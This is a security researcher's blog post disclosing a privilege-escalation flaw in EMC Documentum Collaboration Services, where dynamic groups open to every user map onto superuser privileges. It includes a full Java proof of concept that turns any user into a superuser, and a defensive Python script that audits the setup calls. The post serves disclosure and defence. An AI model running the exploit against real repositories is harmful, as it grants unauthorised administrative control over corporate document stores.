God bless EMC. Part III

In November 2013 I noted that it is not a good idea to give non-privileged users access to the API Tester component in WDK applications, for the following reasons:

In the latest WDK patches EMC restricted access to the API Tester component, and now only superusers are able to use it:

But I completely missed the fact that Collaboration Services (which are installed by default) create a number of dynamic, non-protected groups:

Call UpdatePrivGroup( "dce_room_creator", "dm_create_group" )
Call UpdatePrivGroup( "dce_create_room_groups", "dm_create_group" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_user" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_cabinet" )
Call UpdatePrivGroup( "dce_datatable_creator", "dm_create_type" )
Call UpdatePrivGroup( "dcs_privileged_users", "dm_superusers" )

Call AddGroupToRole("dce_create_room_groups", "dm_world" )
Call AddGroupToRole("dce_datatable_creator", "dm_world" )
Call AddGroupToRole("dcs_privileged_users", "dm_world" )

Call AddAttributeValueToRole( "dce_datatable_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "is_module_only", "T" )
Call AddAttributeValueToRole( "dce_datatable_creator", "group_class", "module role" )

Call AddAttributeValueToRole( "dcs_privileged_users", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "is_module_only", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "group_class", "module role" )

Call AddAttributeValueToRole( "dce_room_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_room_creator", "is_module_only", "T" )

Call AddAttributeValueToRole( "dce_create_room_groups", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_create_room_groups", "is_module_only", "T" )
Call AddAttributeValueToRole("dce_create_room_groups", "group_class", "module role")

Call AddAttributeValueToRole( "dce_user_manager", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_user_manager", "is_module_only", "T" )

Call AddGroupAdminToGroup( "dce_create_room_groups", "dce_room_creator" )
Call AddGroupAdminToGroup( "dce_hidden_users", "dce_user_manager" )

This means that in previous releases of WDK applications any user is able to escalate privileges using the API Tester component and, moreover, even now a user who is able to connect to the Content Server directly is also able to escalate privileges:

package com.documentum.fc.client.security.impl;

import static java.lang.System.out;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.common.DfId;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;
import com.documentum.fc.common.IDfLoginInfo;

public class Test {

    public static void main(String argv[]) throws Exception {
        String docbase = argv[0];
        String username = argv[1];
        String password = argv[2];
        String domain = null;
        if (argv.length == 4) {
            domain = argv[3];
        }

        IDfSessionManager sessionManager = new DfClient().newSessionManager();
        IDfLoginInfo loginInfo = new DfLoginInfo(username, password);
        if (domain != null) {
            loginInfo.setDomain(domain);
        }
        sessionManager.setIdentity(docbase, loginInfo);
        out.println("Connecting to docbase '" + docbase + "' as '" + username
                + "'");
        IDfSession session = sessionManager.getSession(docbase);
        out.println("Connected");
        IDfList arguments = new DfList(new String[] {"QUERY",
            "__REQUESTED_PROTECTED_ROLES", });
        IDfList types = new DfList(new String[] {"S", "S", });
        IDfList values = new DfList(
                new String[] {
                    "update dm_user object set user_privileges=16 where user_name=USER",
                    "dcs_privileged_users", });
        IDfCollection collection = session.apply(DfId.DF_NULLID_STR,
                "EXEC", arguments, types, values);
        if (collection != null && collection.next()) {
            out.println(collection.dump());
        }
        if (collection != null) {
            collection.close();
        }
    }
}
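A defender-side check, added here and not part of the original post or of EMC's code: it parses the Collaboration Services setup calls quoted above and flags every group that is dynamic, has dm_world as a member and is mapped onto a privileged group, which is exactly the chain the escalation relies on. The script excerpt is copied from the listing above (attribute lines other than is_dynamic omitted); the Call-syntax parsing and the risk logic are my own assumptions.

```python
import re
from collections import defaultdict

# Excerpt of the Collaboration Services setup calls quoted in the post.
SETUP_SCRIPT = """
Call UpdatePrivGroup( "dce_room_creator", "dm_create_group" )
Call UpdatePrivGroup( "dce_create_room_groups", "dm_create_group" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_user" )
Call UpdatePrivGroup( "dce_user_manager", "dm_create_cabinet" )
Call UpdatePrivGroup( "dce_datatable_creator", "dm_create_type" )
Call UpdatePrivGroup( "dcs_privileged_users", "dm_superusers" )
Call AddGroupToRole("dce_create_room_groups", "dm_world" )
Call AddGroupToRole("dce_datatable_creator", "dm_world" )
Call AddGroupToRole("dcs_privileged_users", "dm_world" )
Call AddAttributeValueToRole( "dce_datatable_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dcs_privileged_users", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_room_creator", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_create_room_groups", "is_dynamic", "T" )
Call AddAttributeValueToRole( "dce_user_manager", "is_dynamic", "T" )
"""

# Assumed shape of a setup call: Call Name( "arg", "arg", ... )
CALL_RE = re.compile(r'Call\s+(\w+)\s*\(\s*((?:"[^"]*"\s*,?\s*)+)\)')

def parse_calls(script):
    """Yield (function_name, [string args]) for every Call line."""
    for m in CALL_RE.finditer(script):
        yield m.group(1), re.findall(r'"([^"]*)"', m.group(2))

def audit_dynamic_groups(script):
    """Return {group: [privileged groups]} for groups that are dynamic,
    contain dm_world and are linked to a privileged group via UpdatePrivGroup."""
    priv = defaultdict(set)   # role -> privileged groups it is mapped to
    world = set()             # roles that list dm_world as a member
    dynamic = set()           # roles marked is_dynamic = T
    for fn, args in parse_calls(script):
        if fn == "UpdatePrivGroup":
            priv[args[0]].add(args[1])
        elif fn == "AddGroupToRole" and args[1] == "dm_world":
            world.add(args[0])
        elif fn == "AddAttributeValueToRole" and args[1:] == ["is_dynamic", "T"]:
            dynamic.add(args[0])
    # Only groups that satisfy all three conditions are reachable by any user.
    return {g: sorted(p) for g, p in priv.items() if g in dynamic and g in world}

if __name__ == "__main__":
    for group, privs in sorted(audit_dynamic_groups(SETUP_SCRIPT).items()):
        print(f"{group}: world-joinable dynamic group mapped to {', '.join(privs)}")
```

Roles such as dce_room_creator and dce_user_manager are dynamic and privileged but not world-joinable, so they are not flagged; dcs_privileged_users shows up mapped to dm_superusers.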

Update

On March 3rd, 2014 EMC announced a fix for TaskSpace (actually they just restricted access to API Tester); the suggested workaround gave me a lot of amusement: